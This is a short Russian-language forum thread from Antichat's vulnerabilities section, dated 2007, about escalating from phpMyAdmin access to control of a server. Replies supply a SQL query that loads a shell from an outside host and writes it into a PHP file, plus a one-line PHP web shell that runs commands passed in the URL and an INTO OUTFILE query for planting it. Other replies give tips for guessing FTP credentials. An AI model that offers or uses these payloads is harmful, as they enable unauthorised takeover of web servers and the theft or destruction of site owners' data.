Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Как получить доступ к ФТП, если владею mysql через phpmyadmin? (https://forum.antichat.xyz/showthread.php?t=52079)

stolker 26.10.2007 21:18

Как получить доступ к ФТП, если владею mysql через phpmyadmin?
 
:confused:

n1†R0x 26.10.2007 21:23

конечно нету, весьма маловероятно, что пароль сходится...

все, что ты сейчас можешь сделать, как мне кажется, это залить шелл через sql-запрос вида
select load_file('http://blablabla.ru/shell.txt') from mysql.user into outfile 'mda.php'

stolker 26.10.2007 21:26

Цитата:

Сообщение от n1†R0x
конечно нету, весьма маловероятно, что пароль сходится...

все, что ты сейчас можешь сделать, как мне кажется, это залить шелл через sql-запрос вида
select load_file('http://blablabla.ru/shell.txt') from mysql.user into outfile 'mda.php'

Скиньте шел плиз в текстовом виде, и где шел будет находиться? :( например в mda.php?

Azazel 26.10.2007 21:34

Для начала почитать фак на сайте хостера про фтп (Надо бы узнать куда коннектится и с каким юзернэйм). Потом попробовать известные тебе пароли. Потом попробовать залить шелл. Дальше, в зависимомти от прав, опыта и удачи.
Например логином часто бывает директория пользоателя, например /home/www/sd34ret6/http

stolker 26.10.2007 21:38

Мне главное достать шел. скинте пожалуйста.

_Master- 26.10.2007 21:47

'<?php system($_GET[cmd]); ?>' в текстовый файл без кавычек )
Запрос - shell.php?cmd=команда

Можно просто
SELECT '<?php system($cmd) ?>' FROM `таблица` INTO OUTFILE '/путь/до/шелла.php'


Время: 11:48